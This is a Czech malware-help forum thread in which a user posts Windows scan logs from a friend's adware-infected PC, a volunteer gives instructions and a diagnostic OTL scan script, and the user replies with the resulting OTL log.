2014-07-22 21:20:02 ----D---- C:\Program Files (x86)\Sensible Vision
2014-07-22 21:18:46 ----D---- C:\ProgramData\Package Cache
2014-07-19 21:41:07 ----A---- C:\Windows\wininit.ini
2014-07-19 10:58:01 ----D---- C:\files
2014-07-19 10:31:28 ----D---- C:\Program Files (x86)\Nitin Softwares
2014-07-18 12:31:14 ----A---- C:\awh8AC1.tmp
2014-07-17 17:28:17 ----A---- C:\awh7925.tmp
2014-07-17 17:00:13 ----D---- C:\Users\2014\AppData\Roaming\FirefoxToolbar
2014-07-13 20:54:19 ----D---- C:\Users\2014\AppData\Roaming\Template
2014-07-13 12:24:46 ----A---- C:\awh39EA.tmp
2014-07-13 12:22:21 ----D---- C:\ProgramData\IePluginServices
2014-07-13 12:22:11 ----D---- C:\Program Files (x86)\SupTab
2014-07-13 12:22:01 ----D---- C:\ProgramData\WindowsMangerProtect
2014-07-13 12:21:02 ----D---- C:\Users\2014\AppData\Roaming\webssearches
2014-07-13 09:36:09 ----D---- C:\Users\2014\AppData\Roaming\ImperiaOnline
2014-07-13 08:44:38 ----D---- C:\Users\2014\AppData\Roaming\QuickScan
2014-07-13 08:43:31 ----D---- C:\Program Files (x86)\Zrychleni Pocitace
2014-07-13 08:43:04 ----D---- C:\Program Files (x86)\globalUpdate
2014-07-13 08:42:41 ----D---- C:\Users\2014\AppData\Roaming\uTorrent
2014-07-11 15:52:44 ----D---- C:\Windows\Minidump
2014-07-10 15:49:34 ----D---- C:\Program Files (x86)\YouTUBE (TM) movie downloader
2014-07-10 15:21:31 ----D---- C:\Program Files (x86)\Hitman Contracts
2014-07-10 13:28:08 ----D---- C:\Program Files\astragon
2014-07-09 17:16:02 ----A---- C:\Windows\SYSWOW64\CmdLineExt.dll
2014-07-09 17:14:06 ----D---- C:\Program Files (x86)\Eidos
2014-07-09 17:04:48 ----D---- C:\IExp1.tmp
2014-07-09 17:04:44 ----D---- C:\IExp0.tmp
2014-07-09 17:04:42 ----D---- C:\Windows\RegisteredPackages
2014-07-09 17:04:41 ----HD---- C:\Windows\msdownld.tmp
2014-07-09 17:04:37 ----D---- C:\Program Files (x86)\Windows Media Components
2014-07-09 17:00:44 ----D---- C:\Program Files (x86)\Ulead Systems
2014-07-09 16:47:48 ----D---- C:\Program Files (x86)\Microsoft Works
2014-07-09 16:38:20 ----D---- C:\Program Files (x86)\GameSpy Arcade
2014-07-09 09:28:30 ----A---- C:\Windows\SYSWOW64\installd.exe
2014-07-08 21:14:53 ----D---- C:\Program Files (x86)\astragon
2014-07-08 20:05:46 ----D---- C:\Program Files (x86)\Bus Simulator 2008 Demo
2014-07-08 19:14:10 ----A---- C:\Windows\system32\drivers\{5906ab0f-5417-45a6-a4f5-8bc38ae936d5}Gw64.sys
2014-07-08 17:57:24 ----D---- C:\Program Files\PCDApp
2014-07-08 17:54:17 ----D---- C:\Users\2014\AppData\Roaming\PowerISO
2014-07-08 17:53:33 ----D---- C:\ProgramData\ff014dd81615e606
2014-07-08 17:53:31 ----D---- C:\ProgramData\CostMin
2014-07-08 17:53:29 ----D---- C:\Program Files (x86)\CostMin
2014-07-08 17:50:51 ----D---- C:\Program Files (x86)\XZip
2014-07-01 20:09:34 ----D---- C:\Users\2014\AppData\Roaming\AVG
2014-07-01 20:08:19 ----D---- C:\ProgramData\AVG
2014-07-01 20:08:10 ----SHD---- C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-07-01 20:08:09 ----HD---- C:\ProgramData\Common Files
2014-07-01 20:06:54 ----D---- C:\Users\2014\AppData\Roaming\OpenCandy
2014-07-01 19:51:53 ----D---- C:\Users\2014\AppData\Roaming\Apple Computer
2014-07-01 19:51:49 ----D---- C:\ProgramData\Unity
2014-07-01 19:42:36 ----D---- C:\Program Files (x86)\Unity
2014-07-01 17:36:56 ----D---- C:\Program Files (x86)\Abyssmedia
2014-07-01 14:41:17 ----D---- C:\Program Files (x86)\Game_Maker8
2014-07-01 08:23:46 ----SHD---- C:\found.000
2014-06-30 14:22:11 ----D---- C:\Program Files (x86)\VirtualDJ
2014-06-30 14:06:31 ----D---- C:\Program Files\CCleaner
2014-06-26 17:59:39 ----A---- C:\Windows\system32\stobject.dll
2014-06-26 17:59:38 ----A---- C:\Windows\system32\SndVolSSO.dll
2014-06-26 17:59:37 ----A---- C:\Windows\system32\shell32.dll
2014-06-26 17:59:36 ----A---- C:\Windows\system32\pnidui.dll
2014-06-26 17:59:24 ----A---- C:\Windows\system32\imageres.dll
2014-06-26 17:59:24 ----A---- C:\Windows\system32\ExplorerFrame.dll
2014-06-26 17:59:24 ----A---- C:\Windows\system32\browseui.dll
2014-06-26 17:59:23 ----A---- C:\Windows\system32\batmeter.dll
2014-06-26 17:59:23 ----A---- C:\Windows\system32\authui.dll
2014-06-26 17:59:21 ----A---- C:\Windows\explorer.exe
2014-06-26 17:31:40 ----D---- C:\Program Files (x86)\UltraUXThemePatcher
2014-06-26 17:31:40 ----A---- C:\Windows\system32\themeservice.dll.backup
2014-06-26 17:31:39 ----A---- C:\Windows\system32\themeui.dll.backup
2014-06-26 17:31:33 ----A---- C:\Windows\system32\uxtheme.dll.backup
2014-06-26 16:38:15 ----A---- C:\Windows\system32\taskmgr.exe
2014-06-26 15:50:46 ----D---- C:\Program Files (x86)\UX Pack
2014-06-26 15:50:46 ----A---- C:\Windows\SYSWOW64\moveex.exe
2014-06-26 13:31:27 ----D---- C:\Program Files\Movie Maker
2014-06-25 18:43:02 ----D---- C:\ProgramData\IsolatedStorage
2014-06-25 18:19:09 ----D---- C:\Users\2014\AppData\Roaming\IObit
2014-06-25 18:14:38 ----D---- C:\Windows\UXBackup

======List of files/folders modified in the last 1 months======

2014-07-23 16:29:17 ----SD---- C:\Users\2014\AppData\Roaming\Microsoft
2014-07-23 09:51:10 ----D---- C:\Windows\Temp
2014-07-23 09:51:03 ----RD---- C:\Program Files
2014-07-23 09:50:49 ----D---- C:\Users\2014\AppData\Roaming\Seznam.cz
2014-07-23 09:48:09 ----D---- C:\Windows
2014-07-23 09:08:08 ----D---- C:\Windows\system32\config
2014-07-23 09:05:15 ----SHD---- C:\Windows\Installer
2014-07-23 09:05:14 ----SHD---- C:\Config.Msi
2014-07-23 09:03:15 ----D---- C:\Windows\System32
2014-07-23 09:03:10 ----RD---- C:\Program Files (x86)
2014-07-22 21:54:05 ----D---- C:\Windows\SysWOW64
2014-07-22 21:53:33 ----SHD---- C:\System Volume Information
2014-07-22 21:46:40 ----RSD---- C:\Windows\Fonts
2014-07-22 21:22:16 ----D---- C:\Windows\system32\Tasks
2014-07-22 21:22:15 ----D---- C:\Windows\Tasks
2014-07-22 21:20:55 ----D---- C:\Windows\system32\drivers
2014-07-22 21:20:51 ----D---- C:\Windows\inf
2014-07-22 21:20:47 ----D---- C:\Windows\system32\catroot
2014-07-22 21:20:46 ----D---- C:\Windows\system32\DriverStore
2014-07-22 21:18:46 ----HD---- C:\ProgramData
2014-07-22 15:16:43 ----D---- C:\Windows\rescache
2014-07-22 15:14:39 ----D---- C:\Users\2014\AppData\Roaming\update_tc
2014-07-21 22:27:31 ----D---- C:\Users\2014\AppData\Roaming\Skype
2014-07-21 21:25:06 ----A---- C:\Windows\system32\PerfStringBackup.INI
2014-07-20 12:21:40 ----D---- C:\Windows\winsxs
2014-07-20 12:21:40 ----D---- C:\Windows\system32\wfp
2014-07-20 12:21:40 ----D---- C:\Windows\system32\wbem
2014-07-20 12:21:40 ----D---- C:\Windows\system32\CodeIntegrity
2014-07-20 12:21:40 ----D---- C:\Windows\system32\catroot2
2014-07-20 12:21:20 ----D---- C:\Windows\registration
2014-07-19 21:42:14 ----HD---- C:\Program Files (x86)\InstallShield Installation Information
2014-07-19 09:30:56 ----D---- C:\Windows\system32\FxsTmp
2014-07-13 12:19:41 ----D---- C:\Program Files (x86)\Common Files
2014-07-13 08:43:28 ----SD---- C:\ProgramData\Microsoft
2014-07-11 12:31:49 ----D---- C:\Users\2014\AppData\Roaming\Media Player Classic
2014-07-11 11:51:11 ----D---- C:\ProgramData\Microsoft Help
2014-07-10 09:16:28 ----D---- C:\Windows\system32\NDF
2014-07-09 16:51:00 ----D---- C:\Program Files (x86)\Microsoft Office
2014-07-08 21:14:16 ----A---- C:\Windows\win.ini
2014-07-08 17:53:29 ----HD---- C:\Windows\system32\GroupPolicy
2014-07-08 17:53:29 ----D---- C:\Windows\SYSWOW64\GroupPolicy
2014-07-08 17:53:28 ----RD---- C:\Users
2014-07-06 15:44:23 ----RSD---- C:\Windows\Media
2014-07-06 15:22:13 ----D---- C:\Windows\system32\wdi
2014-07-01 15:30:50 ----D---- C:\Windows\system32\LogFiles
2014-06-30 14:43:13 ----D---- C:\Windows\Panther
2014-06-30 14:43:13 ----D---- C:\Windows\Logs
2014-06-30 14:43:12 ----D---- C:\Windows\debug
2014-06-26 17:58:37 ----D---- C:\Windows\Cursors
2014-06-26 17:31:40 ----A---- C:\Windows\system32\themeservice.dll
2014-06-26 17:31:39 ----A---- C:\Windows\system32\themeui.dll
2014-06-26 17:31:33 ----A---- C:\Windows\system32\uxtheme.dll
2014-06-26 13:45:49 ----D---- C:\Windows\Branding

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 MpFilter;Microsoft Malware Protection Driver; C:\Windows\system32\DRIVERS\MpFilter.sys [2014-01-25 268512]
R0 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-21 213888]
R1 {5906ab0f-5417-45a6-a4f5-8bc38ae936d5}Gw64;{5906ab0f-5417-45a6-a4f5-8bc38ae936d5}Gw64; C:\Windows\system32\drivers\{5906ab0f-5417-45a6-a4f5-8bc38ae936d5}Gw64.sys [2014-07-03 61112]
R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys [2009-07-14 59904]
R2 ASMMAP64;ASMMAP64; \??\C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\ASMMAP64.sys [2009-07-02 15416]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2011-03-09 9319424]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2011-03-09 303616]
R3 athr;Atheros Extensible Wireless LAN device driver; C:\Windows\system32\DRIVERS\athrx.sys [2011-06-27 2753536]
R3 AtiHDAudioService;ATI Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2010-11-17 115216]
R3 BthEnum;Ovladač pro Bluetooth Request Block; C:\Windows\system32\drivers\BthEnum.sys [2009-07-14 41984]
R3 BthPan;Zařízení Bluetooth (síť PAN); C:\Windows\system32\DRIVERS\bthpan.sys [2009-07-14 118784]
R3 BTHUSB;Ovladač rozhraní USB radiostanice Bluetooth; C:\Windows\System32\Drivers\BTHUSB.sys [2011-04-28 80384]
R3 HECIx64;Intel(R) Management Engine Interface; C:\Windows\system32\DRIVERS\HECIx64.sys [2009-09-17 56344]
R3 JMCR;JMCR; C:\Windows\system32\DRIVERS\jmcr.sys [2013-08-30 143472]
R3 JME;JMicron Ethernet Adapter NDIS6.20 Driver (Amd64 Bits); C:\Windows\system32\DRIVERS\JME.sys [2013-08-30 115312]
R3 MTsensor;ATK0100 ACPI UTILITY; C:\Windows\system32\DRIVERS\ATK64AMD.sys [2009-05-13 15928]
R3 RFCOMM;Zařízení Bluetooth (RFCOMM protokol TDI); C:\Windows\system32\DRIVERS\rfcomm.sys [2009-07-14 158720]
S2 uxpatch;uxpatch; \??\C:\Windows\system32\drivers\uxpatch.sys []
S3 BTHPORT;Ovladač portu Bluetooth; C:\Windows\System32\Drivers\BTHport.sys [2012-07-06 552960]
S3 facap;facap, FastAccess Video Capture; C:\Windows\system32\DRIVERS\facap.sys [2012-09-03 38400]
S3 NisDrv;Microsoft Network Inspection System; C:\Windows\system32\DRIVERS\NisDrvWFP.sys [2014-03-11 133928]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2010-11-21 109056]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 IePluginServices;IePlugin Services; C:\ProgramData\IePluginServices\PluginService.exe [2014-07-13 759688]
R2 KMService;KMService; C:\Windows\syswow64\srvany.exe [2014-03-26 8192]
R2 MsMpSvc;Microsoft Antimalware Service; C:\Program Files\Microsoft Security Client\MsMpEng.exe [2014-03-11 23808]
R2 SafePCRepair_89Service;SafePCRepairService; C:\PROGRA~2\SAFEPC~2\bar\1.bin\89barsvc.exe [2014-06-11 88648]
R2 TeamViewer9;TeamViewer 9; C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe [2014-04-02 4972864]
R2 UleadBurningHelper;Ulead Burning Helper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [2004-03-13 49152]
R2 WindowsMangerProtect;WindowsMangerProtect Service; C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe [2014-07-13 535936]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-09-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-09-11 124088]
S2 SkypeUpdate;Skype Updater; C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S2 UnsignedThemes;Unsigned Themes; C:\Windows\UnsignedThemesSvc.exe []
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2014-05-30 111616]
S3 Microsoft SharePoint Workspace Audit Service;Microsoft SharePoint Workspace Audit Service; C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE [2013-12-19 30814400]
S3 NisSrv;@C:\Program Files\Microsoft Security Client\MpAsDesc.dll,-243; C:\Program Files\Microsoft Security Client\NisSrv.exe [2014-03-11 347872]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2010-01-09 149352]
S3 osppsvc;Office Software Protection Platform; C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4925184]
S4 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2012-09-23 65192]
S4 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-03-26 257928]
S4 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2011-03-09 203776]
S4 ASLDRService;ASLDR Service; C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ASLDRSrv.exe [2009-06-15 84536]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2013-09-11 51808]
S4 ATKGFNEXSrv;ATKGFNEX Service; C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe [2009-12-15 96896]
S4 LMS;Intel(R) Management and Security Application Local Management Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe [2009-09-30 262144]
S4 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2014-03-15 119408]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2013-09-11 139856]
S4 UNS;Intel(R) Management & Security Application User Notification Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2009-09-30 2314240]
S4 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2014-03-25 1255736]

-----------------EOF-----------------
Nahoru
Uživatelský avatar
vyosek
VIP
VIP
Příspěvky: 56373
Registrován: 07 lis 2006 15:24
Bydliště: Šalingrad - Brno

Re: Kámošův pc - havěť

#2 Příspěvek od vyosek »

Zdravim :)

:arrow: Stahnete OTL http://oldtimer.geekstogo.com/OTL.exe a ulozte jej na plochu
  • Pokud pouzivate Win Vista ci W7, kliknete na OTL pravym a dejte Run As Administrator ci Spustit jako spravce
  • Pokud pouzivate 64bitovy OS, zkontrolujte, zda-li je zaskrtnuty ctverecek u Pro 64 bitové OS, pokud ne, zaskrtnete jej
  • Zaskrtnete okenko Pro vsechny uzivatele
  • Zaskrtnete okenko Kontrola na havet "LOP"
  • Zaskrtnete okenko Kontrola na havet "Purity"
  • Stari souboru zmente z 30 dnu na 7 dnu
  • Do spodniho okenka Vlastni skenovani/opravy vlozte skript nize

  • Kód: Vybrat vše

    CREATERESTOREPOINT

netsvcs
drivers32
savembr:0

/md5start
atapi.sys
autochk.exe
cdrom.sys
explorer.exe
hal.dll
scecli.dll
services.exe
svchost.exe
tcpip.sys
userinit.exe
winlogon.exe
/md5stop

%systemroot%*.* /U /s
%SYSTEMDRIVE%\*.exe
%ALLUSERSPROFILE%\Application Data\*.
%ALLUSERSPROFILE%\Application Data\*.exe /s
%APPDATA%\*.
%APPDATA%\*.exe /s
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\system32\drivers\*.sys /3
%systemroot%\system32\*.* /3
%SYSTEMDRIVE%\*.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s

%PROGRAMFILES%\Mozilla Firefox\firefox.exe /md5
%PROGRAMFILES%\Internet Explorer\iexplore.exe /md5
%PROGRAMFILES%\Opera\opera.exe /md5
%PROGRAMFILES%\Google\Chrome\Application\chrome.exe /md5

%SystemDrive%\PhysicalMBR.bin /md5 

*crack* /s
*keygen* /s
*loader* /s
  • Kliknete na tlacitko Prohledat
  • Po dokonceni skenu (cca 10 az 15 min) se objevi logy OTL.txt a Extras.txt, oba sem vlozte
  • Pokud budou logy dlouhe (forum bude kricet o prekroceni maximalniho poctu znaku), tak je rozdelte do vice prispevku
"Kdo víno má a nepije,kdo hrozny má a nejí je, kdo ženu má a nelíbá, kdo zábavě se vyhýbá, na toho vemte bič a hůl, to není člověk, to je vůl."
Člen Obrázek od 1. února 2011.
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#3 Příspěvek od neumimvymysletjmeno »

OTL logfile created on: 23.7.2014 10:43:08 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2014\Desktop
64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17126)
Locale: 00000405 | Country: Česká republika | Language: CSY | Date Format: d.M.yyyy

3,86 Gb Total Physical Memory | 2,50 Gb Available Physical Memory | 64,93% Memory free
7,71 Gb Paging File | 6,16 Gb Available in Paging File | 79,88% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 117,09 Gb Total Space | 49,85 Gb Free Space | 42,57% Space Free | Partition Type: NTFS
Drive D: | 348,57 Gb Total Space | 348,23 Gb Free Space | 99,90% Space Free | Partition Type: NTFS

Computer Name: 2014-ASUS | User Name: Roland | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 7 Days

========== Processes (SafeList) ==========

PRC - [2014.07.23 10:41:29 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2014\Desktop\OTL.exe
PRC - [2014.07.13 12:22:15 | 000,759,688 | ---- | M] (Cherished Technololgy LIMITED) -- C:\ProgramData\IePluginServices\PluginService.exe
PRC - [2014.07.13 12:21:59 | 000,535,936 | ---- | M] (Fuyu LIMITED) -- C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
PRC - [2014.07.13 08:43:41 | 001,331,792 | ---- | M] (BitTorrent Inc.) -- C:\Users\2014\AppData\Roaming\uTorrent\uTorrent.exe
PRC - [2014.06.11 18:15:04 | 000,088,648 | ---- | M] (COMPANYVERS_NAME) -- C:\Program Files (x86)\SafePCRepair_89\bar\1.bin\89barsvc.exe
PRC - [2014.05.25 11:23:21 | 007,913,472 | ---- | M] (Bandoo Media Inc.) -- C:\Users\2014\AppData\Local\iLivid\iLivid.exe
PRC - [2014.04.02 15:27:36 | 004,972,864 | ---- | M] (TeamViewer GmbH) -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
PRC - [2014.03.26 00:18:49 | 000,151,552 | ---- | M] () -- C:\Windows\KMService.exe
PRC - [2014.03.26 00:18:49 | 000,008,192 | ---- | M] () -- C:\Windows\SysWOW64\srvany.exe
PRC - [2013.06.07 13:45:00 | 000,568,334 | --S- | M] () -- C:\Windows\inf\msqjxsas\msqjxsas.exe
PRC - [2013.04.12 10:13:24 | 000,457,208 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\szndesktop.exe
PRC - [2012.02.07 23:46:10 | 007,663,936 | ---- | M] (Luxand, Inc.) -- C:\Program Files (x86)\Luxand\Blink!\LuxandBlinkTray.exe
PRC - [2007.09.02 14:58:52 | 000,495,616 | ---- | M] () -- C:\Program Files (x86)\RocketDock\RocketDock.exe
PRC - [2004.03.13 04:04:16 | 000,049,152 | ---- | M] (Ulead Systems, Inc.) -- C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe


========== Modules (No Company Name) ==========

MOD - [2014.02.05 16:38:08 | 000,076,288 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\libchinst.dll
MOD - [2013.07.08 17:53:29 | 000,450,048 | ---- | M] () -- C:\Program Files (x86)\CostMin\hG_.dll
MOD - [2013.06.07 13:45:00 | 000,568,334 | --S- | M] () -- C:\Windows\inf\msqjxsas\msqjxsas.exe
MOD - [2013.06.07 13:45:00 | 000,279,955 | --S- | M] () -- C:\Windows\inf\msqjxsas\libidn-11.dll
MOD - [2013.06.07 13:45:00 | 000,084,992 | --S- | M] () -- C:\Windows\inf\msqjxsas\zlib1.dll
MOD - [2013.04.29 11:54:54 | 001,663,000 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\libfoxcub.dll
MOD - [2013.04.12 10:13:24 | 000,457,208 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\szndesktop.exe
MOD - [2013.03.29 13:37:34 | 000,059,384 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\23890libfoxloader.dll
MOD - [2013.03.25 16:39:52 | 000,894,968 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\lightspeed.dll
MOD - [2007.09.02 14:58:52 | 000,495,616 | ---- | M] () -- C:\Program Files (x86)\RocketDock\RocketDock.exe
MOD - [2007.09.02 14:57:36 | 000,069,632 | ---- | M] () -- C:\Program Files (x86)\RocketDock\RocketDock.dll


========== Services (SafeList) ==========

SRV:64bit: - [2014.05.30 11:21:05 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014.03.11 12:34:10 | 000,347,872 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014.03.11 12:34:10 | 000,023,808 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013.05.27 07:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2011.03.09 22:50:42 | 000,203,776 | ---- | M] (AMD) [Disabled | Stopped] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility)
SRV - [2014.07.13 12:22:15 | 000,759,688 | ---- | M] (Cherished Technololgy LIMITED) [Auto | Running] -- C:\ProgramData\IePluginServices\PluginService.exe -- (IePluginServices)
SRV - [2014.07.13 12:21:59 | 000,535,936 | ---- | M] (Fuyu LIMITED) [Auto | Running] -- C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe -- (WindowsMangerProtect)
SRV - [2014.06.11 18:15:04 | 000,088,648 | ---- | M] (COMPANYVERS_NAME) [Auto | Running] -- C:\Program Files (x86)\SafePCRepair_89\bar\1.bin\89barsvc.exe -- (SafePCRepair_89Service)
SRV - [2014.04.02 15:27:36 | 004,972,864 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe -- (TeamViewer9)
SRV - [2014.03.26 00:48:54 | 000,257,928 | ---- | M] (Adobe Systems Incorporated) [Disabled | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014.03.26 00:18:49 | 000,008,192 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\srvany.exe -- (KMService)
SRV - [2014.03.15 10:40:31 | 000,119,408 | ---- | M] (Mozilla Foundation) [Disabled | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013.10.23 09:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013.09.11 22:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2012.09.23 21:43:34 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) [Disabled | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2009.12.15 11:39:38 | 000,096,896 | ---- | M] (ASUS) [Disabled | Stopped] -- C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe -- (ATKGFNEXSrv)
SRV - [2009.09.30 20:34:22 | 002,314,240 | ---- | M] (Intel Corporation) [Disabled | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2009.09.30 20:33:08 | 000,262,144 | ---- | M] (Intel Corporation) [Disabled | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2009.06.15 18:30:42 | 000,084,536 | ---- | M] (ASUS) [Disabled | Stopped] -- C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe -- (ASLDRService)
SRV - [2009.06.10 23:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2004.03.13 04:04:16 | 000,049,152 | ---- | M] (Ulead Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe -- (UleadBurningHelper)


========== Driver Services (SafeList) ==========

DRV:64bit: - [2014.07.03 19:55:02 | 000,061,112 | ---- | M] (StdLib) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\{5906ab0f-5417-45a6-a4f5-8bc38ae936d5}Gw64.sys -- ({5906ab0f-5417-45a6-a4f5-8bc38ae936d5}Gw64)
DRV:64bit: - [2014.03.11 09:52:30 | 000,133,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2013.10.02 04:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013.08.30 14:46:15 | 000,143,472 | ---- | M] (JMicron Technology Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\jmcr.sys -- (JMCR)
